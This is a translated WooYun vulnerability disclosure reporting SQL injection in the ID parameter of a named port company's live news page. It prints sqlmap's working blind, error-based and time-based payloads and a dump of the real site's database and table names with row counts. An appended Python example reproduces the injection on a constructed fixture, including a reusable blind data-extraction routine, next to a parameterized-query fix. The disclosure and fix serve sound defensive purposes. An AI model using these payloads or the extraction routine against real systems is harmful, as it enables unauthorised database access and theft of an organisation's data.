
Vulnerability summary

Defect ID: wooyun-2015-0130545

Title: SQL injection on the main website of 南沙港务集团 (Nansha Port Group)

Vendor: 南沙港务集团 (Nansha Port Group)

Author: 李叫兽就四李叫兽

Submitted: 2015-08-03 07:37

Fix time: 2015-09-20 09:56

Public: 2015-09-20 09:56

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: none



Vulnerability details

Disclosure status:

2015-08-03: Details sent to the vendor, awaiting the vendor's response
2015-08-06: Vendor confirmed; details visible only to the vendor
2015-08-16: Details disclosed to core white hats and domain experts
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to intern white hats
2015-09-20: Details disclosed to the public

Brief description:

SQL injection on the main website of 南沙港务集团 (Nansha Port Group)

Details:

http://www.gnict.com/cn/news/news_list.jsp?ID=4682

Injection point (the ID parameter of news_list.jsp; sqlmap output follows):
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=4682' AND 4872=4872 AND 'fjUy'='fjUy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ID=4682' AND 3314=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3314=3314) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'vPXF'='vPXF
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: ID=4682' AND 8737=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'aSVx'='aSVx
---
web application technology: JSP
back-end DBMS: Oracle
available databases [11]:
[*] CTBIS
[*] CTBOS
[*] CTCOM
[*] CTPLAN
[*] CTWEB
[*] CTXSYS
[*] MDSYS
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
Database: WKSYS
[5 tables]
+--------------------------------+
| WK$CHARSET |
| WK$CRAWLER_CONFIG_DEFAULT |
| WK$LANG |
| WK$MIMETYPES |
| WK$SYS_CONFIG |
+--------------------------------+
Database: CTBOS
[5 tables]
+--------------------------------+
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
+--------------------------------+
Database: CTWEB
[36 tables]
+--------------------------------+
| CNTR_CORP_COD_TRAN |
| CONTRACT_IE_DOC_WEB |
| C_TRUCK_CLASS_TIM |
| GG_INFO |
| GSGG |
| HANGYE_INFO |
| HYQXZD |
| IE_CON_CNTR_WEB |
| IE_CON_CRG_WEB |
| JSCYZD |
| JSQXZD |
| JSZD |
| MEMBER |
| MEMBER_CUST_COD |
| MEMBER_CUST_COD1 |
| NEWS |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| QUEST_SL_TEMP_EXPLAIN1 |
| QXZD |
| RAS_DETAIL |
| RAS_ENROLL |
| SCJB |
| SQLEXPERT_PLAN1 |
| STATION_COD |
| S_CODE_I |
| S_LOG |
| TOAD_PLAN_TABLE |
| TRAIN_CNTR_WEB |
| TRAIN_WEB |
| T_SHIP_CNTR_NUM10 |
| T_TRAIN_CNTR_STA |
| T_TRAIN_CNTR_STA2 |
+--------------------------------+
Database: SYS
[12 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| AW$CWMTOECM |
| AW$EXPRESS |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| OLAPTABLEVELS |
| OLAPTABLEVELTUPLES |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
+--------------------------------+
Database: CTCOM
[5 tables]
+--------------------------------+
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
+--------------------------------+
Database: MDSYS
[10 tables]
+--------------------------------+
| CS_SRS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_ANGLE_UNITS |
| SDO_AREA_UNITS |
| SDO_DATUMS |
| SDO_DIST_UNITS |
| SDO_ELLIPSOIDS |
| SDO_PROJECTIONS |
| USER_CS_SRS |
| USER_TRANSFORM_MAP |
+--------------------------------+
Database: CTBIS
[5 tables]
+--------------------------------+
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
+--------------------------------+
Database: CTXSYS
[1 table]
+--------------------------------+
| DR$POLICY_TAB |
+--------------------------------+
Database: WKSYS
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| WK$CHARSET | 57 |
| WK$CRAWLER_CONFIG_DEFAULT | 38 |
| WK$MIMETYPES | 35 |
| WK$LANG | 14 |
| WK$SYS_CONFIG | 1 |
+---------------------------+---------+
Database: CTWEB
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| RAS_DETAIL | 114178 |
| HYQXZD | 3527 |
| T_SHIP_CNTR_NUM10 | 3110 |
| RAS_ENROLL | 470 |
| MEMBER_CUST_COD | 463 |
| NEWS | 440 |
| MEMBER_CUST_COD1 | 406 |
| SQLEXPERT_PLAN1 | 255 |
| T_TRAIN_CNTR_STA | 192 |
| T_TRAIN_CNTR_STA2 | 192 |
| MEMBER | 114 |
| QXZD | 33 |
| TOAD_PLAN_TABLE | 30 |
| GSGG | 29 |
| PBCATEDT | 21 |
| PBCATFMT | 20 |
| TRAIN_CNTR_WEB | 13 |
| S_CODE_I | 10 |
| JSCYZD | 7 |
| JSZD | 7 |
| TRAIN_WEB | 7 |
| IE_CON_CNTR_WEB | 6 |
| CNTR_CORP_COD_TRAN | 5 |
| C_TRUCK_CLASS_TIM | 4 |
| GG_INFO | 3 |
| STATION_COD | 3 |
| CONTRACT_IE_DOC_WEB | 2 |
| IE_CON_CRG_WEB | 2 |
| HANGYE_INFO | 1 |
| SCJB | 1 |
+---------------------------+---------+
Database: MDSYS
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| CS_SRS | 1000 |
| SDO_DATUMS | 118 |
| SDO_DIST_UNITS | 54 |
| SDO_AREA_UNITS | 48 |
| SDO_ELLIPSOIDS | 47 |
| SDO_PROJECTIONS | 42 |
| SDO_ANGLE_UNITS | 12 |
+---------------------------+---------+
Database: SYS
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| STMT_AUDIT_OPTION_MAP | 167 |
| SYSTEM_PRIVILEGE_MAP | 157 |
| AUDIT_ACTIONS | 144 |
| TABLE_PRIVILEGE_MAP | 23 |
| "DUAL" | 1 |
| AW$CWMTOECM | 1 |
| AW$EXPRESS | 1 |
+---------------------------+---------+
This is all sensitive corporate data; asking for Rank 20, 19 would also do.

Proof of vulnerability:

See the details above.

Fix recommendation:

Validate the ID parameter (it is numeric, so anything that is not a plain integer can be rejected) and pass it to the database through a parameterized query instead of concatenating it into the SQL string.
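The sqlmap findings above (boolean-based blind, Oracle XMLType error-based, and heavy-query time-based, all against the ID parameter of news_list.jsp) and this fix recommendation, worked through as one added example. This is the editor's code, not the author's or the site's: the NEWS table rows and its ID/TITLE column names are constructed, and the string-concatenation shape of the JSP query is an assumption (the report shows only sqlmap's output, but every payload begins by closing a single-quoted literal and ends by re-opening one, which is what that shape requires). SQLite stands in for Oracle, so UNICODE() takes the place of Oracle's ASCII(), and the XMLType error-based payload is decoded rather than executed.

```python
import re
import sqlite3

# Constructed fixture: a stand-in for the CTWEB.NEWS table listed in the dump.
# Column names ID/TITLE are assumptions; the report only names the table.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE NEWS (ID INTEGER PRIMARY KEY, TITLE TEXT)")
    con.executemany("INSERT INTO NEWS VALUES (?, ?)",
                    [(4681, "Port notice A"), (4682, "Port notice B")])
    return con

# The bug (assumed shape): news_list.jsp?ID=... glued into a single-quoted
# literal, so a ' in the input terminates the literal and the rest is SQL.
def vulnerable_lookup(con, raw_id):
    sql = "SELECT ID, TITLE FROM NEWS WHERE ID='" + raw_id + "'"
    return con.execute(sql).fetchall()

# Boolean-blind payload copied from the sqlmap output; the false twin is constructed.
BOOL_TRUE = "4682' AND 4872=4872 AND 'fjUy'='fjUy"
BOOL_FALSE = "4682' AND 4872=4873 AND 'fjUy'='fjUy"

def blind_oracle(con, condition):
    """One boolean-blind probe in sqlmap's shape, with an arbitrary condition
    where 4872=4872 sat. True iff the page would still show article 4682."""
    return len(vulnerable_lookup(con, f"4682' AND {condition} AND 'fjUy'='fjUy")) > 0

def blind_extract(con, subquery, max_len=64):
    """What 'boolean-based blind' buys an attacker: read any scalar subquery one
    character at a time from true/false page differences (sqlmap automates this).
    UNICODE() is SQLite's spelling of Oracle's ASCII()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not blind_oracle(con, f"LENGTH(({subquery}))>={pos}"):
            break
        lo, hi = 0, 127  # binary search on the code point: 7 probes per character
        while lo < hi:
            mid = (lo + hi) // 2
            if blind_oracle(con, f"UNICODE(SUBSTR(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

# Error-based payload copied from the sqlmap output (CHR()-obfuscated by sqlmap).
ERROR_PAYLOAD = (
    "4682' AND 3314=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||"
    "CHR(106)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3314=3314) THEN 1 ELSE 0 END) "
    "FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) "
    "AND 'vPXF'='vPXF"
)

def decode_chr_chain(payload):
    """Undo CHR(n)||... so the XMLType argument is readable. Oracle rejects the
    result as an element name and echoes it in the XML parse error, so whatever
    sits between the q...q marker strings is leaked straight into the response."""
    inner = re.sub(r"\(SELECT \(CASE WHEN .*? FROM DUAL\)", "{value}", payload)
    decoded = re.sub(r"CHR\((\d+)\)", lambda m: chr(int(m.group(1))), inner)
    return re.search(r"XMLType\((.*?)\)\) FROM DUAL", decoded).group(1).replace("||", "")

# The fix: bind the value (a PreparedStatement in the JSP), and since ID is
# numeric, refuse anything that is not a plain integer before it reaches SQL.
def parameterized_lookup(con, raw_id):
    return con.execute("SELECT ID, TITLE FROM NEWS WHERE ID=?", (raw_id,)).fetchall()

def hardened_lookup(con, raw_id):
    if not re.fullmatch(r"[1-9][0-9]{0,9}", raw_id):
        raise ValueError("ID must be a positive integer")
    return parameterized_lookup(con, int(raw_id))

if __name__ == "__main__":
    con = make_db()
    print("true probe :", vulnerable_lookup(con, BOOL_TRUE))
    print("false probe:", vulnerable_lookup(con, BOOL_FALSE))
    print("extracted  :", blind_extract(con, "SELECT TITLE FROM NEWS WHERE ID=4681"))
    print("XMLType arg:", decode_chr_chain(ERROR_PAYLOAD))
    print("bound      :", parameterized_lookup(con, BOOL_TRUE))
    try:
        hardened_lookup(con, BOOL_TRUE)
    except ValueError as e:
        print("rejected   :", e)
```

The true/false probe pair is the entire basis of boolean-blind extraction: with the concatenated query, sqlmap's payload returns the same page as ID=4682 when its condition holds and an empty result when it does not, which is enough to read any value the database user can SELECT. The decoded XMLType argument shows the marker strings sqlmap looks for in the ORA- error text. The same payload passed as a bound parameter matches nothing, because the driver never parses it as SQL. The heavy-query time-based payload (a five-way self-join of ALL_USERS) is not reproduced here; its only purpose is to make evaluation of the injected condition measurably slow when the page itself shows no difference.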

Copyright notice: when reposting, credit the source: 李叫兽就四李叫兽@乌云


Vulnerability response

Vendor response:

Severity: High

Rank: 10

Confirmed: 2015-08-06 09:55

Vendor reply:

CNVD confirmed and reproduced the reported vulnerability; it has been passed via CNCERT to the Guangdong branch center, which will coordinate remediation with the website's operating unit.

Latest status:

None